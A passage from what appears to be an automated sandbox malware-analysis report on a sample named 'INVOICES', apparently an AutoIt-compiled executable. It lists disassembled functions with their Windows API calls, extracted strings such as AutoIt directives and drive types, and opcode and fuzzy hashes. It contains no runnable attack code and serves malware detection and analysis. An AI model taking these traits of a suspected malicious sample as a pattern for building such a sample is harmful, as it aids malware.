                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                  • Instruction ID: 937e3ceae7a8eddbb4150e2399142d93fe6c233f746b20865f16601dd72761d5
                                                                                                                                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                  • Instruction Fuzzy Hash: 1E41D371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                                                                                                  Function 00943480 Relevance: .0, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                  • Instruction ID: f8b62aacdd702187e13a9f1110ff4574b0ed9dd7f98d48519397c2036fb9b273
                                                                                                                                  • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                  • Instruction Fuzzy Hash: 88018078A10109EFCB44DFA8C5909AEF7B5FB88310B208599E809A7741E730AE41DB80
                                                                                                                                  Function 009434E0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                  • Instruction ID: fae30b6d3988f8b2a644317f56156d4e2684487fcf6ff95e23a66626ba1f7af0
                                                                                                                                  • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                  • Instruction Fuzzy Hash: 0F019278A00109EFCB44DFA8C590DAEF7F5FB48310F608599E809A7701E730AE41DB80
                                                                                                                                  Function 00941E70 Relevance: .0, Instructions: 6COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421076075.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                  • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                  • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                  • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                  Function 007A791B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007A7970
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007A7982
                                                                                                                                  • DestroyWindow.USER32 ref: 007A7990
                                                                                                                                  • GetDesktopWindow.USER32 ref: 007A79AA
                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 007A79B1
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007A7AF2
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007A7B02
                                                                                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7B4A
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 007A7B56
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007A7B90
                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BB2
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BC5
                                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BD0
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 007A7BD9
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BE8
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 007A7BF1
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7BF8
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 007A7C03
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 007A7C15
                                                                                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007C2CAC,00000000), ref: 007A7C2B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 007A7C3B
                                                                                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007A7C61
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007A7C80
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7CA2
                                                                                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007A7E8F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                  • API String ID: 2211948467-2373415609
                                                                                                                                  • Opcode ID: 1c1ddb671d4c5756701fce76febf506e0877af5c4d2e7d812f400855111bcdeb
                                                                                                                                  • Instruction ID: f951b0f93097b93ca15bab064161d3f2f9d034bd6668020adad16212d0a12485
                                                                                                                                  • Opcode Fuzzy Hash: 1c1ddb671d4c5756701fce76febf506e0877af5c4d2e7d812f400855111bcdeb
                                                                                                                                  • Instruction Fuzzy Hash: 49029171900109EFDB14DF68CC89EAE7BB9FF49710F108659F905AB2A1DB78AD01CB64
                                                                                                                                  Function 007B35D4 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,007BF910), ref: 007B3690
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 007B36B4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpperVisibleWindow
                                                                                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                  • API String ID: 4105515805-45149045
                                                                                                                                  • Opcode ID: f125729726aa569225ec7d75dc1ae6b73e3001b15883c02c8e222877f4145bc2
                                                                                                                                  • Instruction ID: 90a8c36e05197c947a9021bdd3c1329f031a3c0aafb23abd8f84941d289d5d98
                                                                                                                                  • Opcode Fuzzy Hash: f125729726aa569225ec7d75dc1ae6b73e3001b15883c02c8e222877f4145bc2
                                                                                                                                  • Instruction Fuzzy Hash: 58D1A270204301DBCB14EF14C895BEA77A5AF95344F148568F9865B3A3CB7CEE8ACB91
                                                                                                                                  Function 007BA60C Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 007BA662
                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 007BA693
                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 007BA69F
                                                                                                                                  • SetBkColor.GDI32(?,000000FF), ref: 007BA6B9
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 007BA6C8
                                                                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 007BA6F3
                                                                                                                                  • GetSysColor.USER32(00000010), ref: 007BA6FB
                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 007BA702
                                                                                                                                  • FrameRect.USER32(?,?,00000000), ref: 007BA711
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 007BA718
                                                                                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 007BA763
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 007BA795
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 007BA7C0
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColor.USER32(00000012), ref: 007BA935
                                                                                                                                    • Part of subcall function 007BA8FC: SetTextColor.GDI32(?,?), ref: 007BA939
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColorBrush.USER32(0000000F), ref: 007BA94F
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColor.USER32(0000000F), ref: 007BA95A
                                                                                                                                    • Part of subcall function 007BA8FC: GetSysColor.USER32(00000011), ref: 007BA977
                                                                                                                                    • Part of subcall function 007BA8FC: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007BA985
                                                                                                                                    • Part of subcall function 007BA8FC: SelectObject.GDI32(?,00000000), ref: 007BA996
                                                                                                                                    • Part of subcall function 007BA8FC: SetBkColor.GDI32(?,00000000), ref: 007BA99F
                                                                                                                                    • Part of subcall function 007BA8FC: SelectObject.GDI32(?,?), ref: 007BA9AC
                                                                                                                                    • Part of subcall function 007BA8FC: InflateRect.USER32(?,000000FF,000000FF), ref: 007BA9CB
                                                                                                                                    • Part of subcall function 007BA8FC: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007BA9E2
                                                                                                                                    • Part of subcall function 007BA8FC: GetWindowLongW.USER32(00000000,000000F0), ref: 007BA9F7
                                                                                                                                    • Part of subcall function 007BA8FC: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007BAA1F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3521893082-0
                                                                                                                                  • Opcode ID: 82afd59a4a6d0beb75e76a70c21e2759c61025f0ac03cec24c2fb40971889aaa
                                                                                                                                  • Instruction ID: 78c9a144ded88ecc9d9865a6fe82433a01ed6d71a6e55f32265af97f1a1befd5
                                                                                                                                  • Opcode Fuzzy Hash: 82afd59a4a6d0beb75e76a70c21e2759c61025f0ac03cec24c2fb40971889aaa
                                                                                                                                  • Instruction Fuzzy Hash: BE915A72408305FFC711AF68DC08F9A7BA9FF88721F108B29F962961A0D779D944CB56
                                                                                                                                  Function 007A75C0 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000), ref: 007A75F3
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007A76B2
                                                                                                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007A76F0
                                                                                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007A7702
                                                                                                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007A7748
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 007A7754
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007A7798
                                                                                                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007A77A7
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 007A77B7
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 007A77BB
                                                                                                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007A77CB
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A77D4
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 007A77DD
                                                                                                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007A7809
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 007A7820
                                                                                                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007A785B
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007A786F
                                                                                                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 007A7880
                                                                                                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007A78B0
                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 007A78BB
                                                                                                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007A78C6
                                                                                                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007A78D0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                  • API String ID: 2910397461-517079104
                                                                                                                                  • Opcode ID: cb4859d0f58e52c02c8ee293a7dd064ce6eb12bff1ab8b70533ea17946f8ca6a
                                                                                                                                  • Instruction ID: 3a92e27968fd778ab0b84d118d700dabef5a5e86af1420f6b20942030fbd0aa7
                                                                                                                                  • Opcode Fuzzy Hash: cb4859d0f58e52c02c8ee293a7dd064ce6eb12bff1ab8b70533ea17946f8ca6a
                                                                                                                                  • Instruction Fuzzy Hash: 95A175B1640619BFEB14DF68DC4AFAE7BB9EB45710F008214FA15A72E1D778AD00CB64
                                                                                                                                  Function 0079AD9C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0079ADAA
                                                                                                                                  • GetDriveTypeW.KERNEL32(?,007BFAC0,?,\\.\,007BF910), ref: 0079AE87
                                                                                                                                  • SetErrorMode.KERNEL32(00000000,007BFAC0,?,\\.\,007BF910), ref: 0079AFE5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode$DriveType
                                                                                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                  • API String ID: 2907320926-4222207086
                                                                                                                                  • Opcode ID: 14f4cc08fbf6c434528c8f5ddd7719edee7ea6d0269fc78f7e984e013c418902
                                                                                                                                  • Instruction ID: 90c43f7ddd1500f4c5ef99e676497f73c5a2c327bd2a2cbb954e6e9653cee83e
                                                                                                                                  • Opcode Fuzzy Hash: 14f4cc08fbf6c434528c8f5ddd7719edee7ea6d0269fc78f7e984e013c418902
                                                                                                                                  • Instruction Fuzzy Hash: EC51A3F464A205FBCF44DB11E9869BDB372AB08700B208566F90AA7291CB7CDD01DBD3
                                                                                                                                  Function 00736A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __wcsnicmp
                                                                                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                  • API String ID: 1038674560-86951937
                                                                                                                                  • Opcode ID: 10b9e1d2edd647e810b08cdebb30af7509a543bd0e7856228187ea1398a3e810
                                                                                                                                  • Instruction ID: c362627c42ce256a8295b02337f106684775c3ff6f952a4727c6aa0bec1d179e
                                                                                                                                  • Opcode Fuzzy Hash: 10b9e1d2edd647e810b08cdebb30af7509a543bd0e7856228187ea1398a3e810
                                                                                                                                  • Instruction Fuzzy Hash: 2B814BF1600215FAEB24AF24CC86FEF7768AF10701F148024FD45AA1D3EBADDA15C6A1
                                                                                                                                  Function 00732C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,?,?), ref: 00732CA2
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00732CE8
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00732CF3
                                                                                                                                  • DestroyCursor.USER32(00000000), ref: 00732CFE
                                                                                                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00732D09
                                                                                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0076C5BB
                                                                                                                                  • 6FAA0200.COMCTL32(?,000000FF,?), ref: 0076C5F4
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0076CA1D
                                                                                                                                    • Part of subcall function 00731B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00732036,?,00000000,?,?,?,?,007316CB,00000000,?), ref: 00731B9A
                                                                                                                                  • SendMessageW.USER32(?,00001053), ref: 0076CA5A
                                                                                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0076CA71
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DestroyMessageSendWindow$DeleteObject$A0200CursorInvalidateMoveRect
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 377055139-4108050209
                                                                                                                                  • Opcode ID: 8b7d134314e345f68852caf4a83049ee2a56930e13a8d2b4265051ec7abcd3ad
                                                                                                                                  • Instruction ID: df27c2fe639e1b6f0b0a263d203369b2ec1a38b8510138b9a66c1fe7c80ea3d0
                                                                                                                                  • Opcode Fuzzy Hash: 8b7d134314e345f68852caf4a83049ee2a56930e13a8d2b4265051ec7abcd3ad
                                                                                                                                  • Instruction Fuzzy Hash: BF126D30600201EFDB26CF24C888BB9B7A5FF05710F548569E996DB263C739EC52DBA1
                                                                                                                                  Function 007B9A4E Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 007B9B04
                                                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 007B9BBD
                                                                                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 007B9BD9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
